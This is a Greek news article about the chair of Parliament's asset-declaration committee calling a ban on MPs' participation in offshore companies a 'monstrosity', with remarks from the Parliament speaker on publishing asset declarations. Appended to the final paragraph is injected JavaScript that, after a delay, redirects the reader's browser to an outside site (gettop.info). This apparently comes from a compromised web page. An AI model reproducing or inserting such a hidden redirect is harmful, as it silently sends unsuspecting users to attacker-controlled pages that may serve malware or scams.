Χριστοδουλοπούλου: Νόμος έκτρωμα η απαγόρευση συμμετοχής βουλευτών σε off-shore

0
3

 

Νόμο «έκτρωμα» που έχει αναγκάσει τα πολιτικά πρόσωπα να σπεύδουν να κλείσουν την συμμετοχή τους σε εταιρείες και τους αναγκάζει «να αποποιούνται της περιουσίας τους» χαρακτήρισε η πρόεδρος της Επιτροπής Πόθεν Έσχες της Βουλής κυρία Τασία Χριστοδουλοπούλου τον νόμο που απαγορεύει τη συμμετοχή βουλευτών αλλά και συγγενικών τους προσώπων σε off shore και πάσης φύσεως εταιρικά σχήματα.

Συμπλήρωσε μάλιστα πως η Επιτροπή έχει γίνει αποδέκτης πολλών παραπόνων από βουλευτές για τη συγκεκριμένη διάταξη.

Μιλώντας σε δημοσιογράφους, κατά τη διάρκεια της παράδοσης των πόθεν έσχες πολιτικών προσώπων για τις χρήσεις 2013-2014, ο πρόεδρος της Βουλής Νίκος Βούτσης και η πρόεδρος της Επιτροπής Τασία Χριστοδουλοπούλου ανέφεραν πως η Βουλή κάνει πράξη τη δέσμευσή της για περισσότερη διαφάνεια με την έγκαιρη δημοσιοποίηση των δηλώσεων περιουσιακής κατάστασης.

Η Πρόεδρος της Επιτροπής, Τασία Χριστοδουλοπούλου ανακοίνωσε ότι οι δηλώσεις περιουσιακής κατάστασης των πολιτικών προσώπων θα μείνουν αναρτημένες για έναν χρόνο και όχι για έναν μήνα, όπως έγινε τις προηγούμενες φορές και υπογράμμισε ότι με αυτή τη γιγάντια προσπάθεια που καταβλήθηκε για έγκαιρη δημοσιοποίηση, δεν θα υπάρχουν πλέον εκκρεμότητες, καθώς για το 2015 η προθεσμία υποβολής λήγει στις 15 Ιανουαρίου, αν δεν προβλεφθεί κάποια παράταση.

Ο κ. Βούτσης, σχολιάζοντας τη διάταξη για τις off shore, δεν αρνήθηκε ότι είναι μια πολύ αυστηρή νομοθετική ρύθμιση που ψηφίστηκε καθ’ υπερβολή έπειτα από διάφορες αντιδράσεις κομμάτων. Ωστόσο, ο Νίκος Βούτσης επισήμανε, ότι είναι θέμα της κυβέρνησης αν κρίνει ότι απαιτείται νομοθετική αλλαγή.

Επίσης, θέλησε να διασκεδάσει τις εντυπώσεις από την αιφνιδιαστική κίνηση να δοθούν χθες στη δημοσιότητα τα πόθεν έσχες ενώ στην επικαιρότητα κυριαρχεί η επιστολή Τσακαλώτου στους θεσμούς. «Η Βουλή έκανε ένα τιτάνιο έργο να τελειώσει τρεις χρήσεις πόθεν έσχες και θέλαμε να δοθεί μέσα στο 2016 ώστε σε λίγους μήνες που θα δοθεί και το 2015 να υπάρχει δυνατότητα σύγκρισης» είπε ο πρόεδρος της Βουλής. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here